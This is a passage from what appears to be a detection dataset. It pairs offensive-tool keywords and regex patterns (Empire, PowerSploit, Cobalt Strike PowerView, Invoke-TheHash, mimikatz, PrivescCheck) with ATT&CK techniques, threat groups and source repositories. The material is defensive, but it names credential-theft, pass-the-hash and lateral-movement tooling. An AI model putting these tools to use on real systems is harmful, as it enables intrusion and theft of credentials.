T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-StickyNotesExtract*",".{0,1000}Invoke\-StickyNotesExtract.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Stompy*",".{0,1000}Invoke\-Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*Invoke-SystemStartupCheck*",".{0,1000}Invoke\-SystemStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Tater.*",".{0,1000}Invoke\-Tater\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-TcpEndpointsCheck*",".{0,1000}Invoke\-TcpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-TheHash*",".{0,1000}Invoke\-TheHash.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.ps1*",".{0,1000}Invoke\-TheHash\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psd1*",".{0,1000}Invoke\-TheHash\.psd1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psm1*",".{0,1000}Invoke\-TheHash\.psm1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheKatz*",".{0,1000}Invoke\-TheKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-ThirdPartyDriversCheck*",".{0,1000}Invoke\-ThirdPartyDriversCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ThreadedFunction*",".{0,1000}Invoke\-ThreadedFunction.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Thunderfox*",".{0,1000}Invoke\-Thunderfox.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-TmpDavFS*",".{0,1000}Invoke\-TmpDavFS.{0,1000}","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","137","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" "*Invoke-TokenDuplication.ps1*",".{0,1000}Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Tokenvator*",".{0,1000}Invoke\-Tokenvator.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UdpEndpointsCheck*",".{0,1000}Invoke\-UdpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UpdateMimikatzScript.ps1*",".{0,1000}Invoke\-UpdateMimikatzScript\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-UrbanBishop*",".{0,1000}Invoke\-UrbanBishop.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-urlcheck -urls*",".{0,1000}invoke\-urlcheck\s\-urls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-UserCheck*",".{0,1000}Invoke\-UserCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserEnvCheck*",".{0,1000}Invoke\-UserEnvCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserGroupsCheck*",".{0,1000}Invoke\-UserGroupsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*invokeuserhunter*",".{0,1000}invokeuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-userhunter*",".{0,1000}invoke\-userhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in 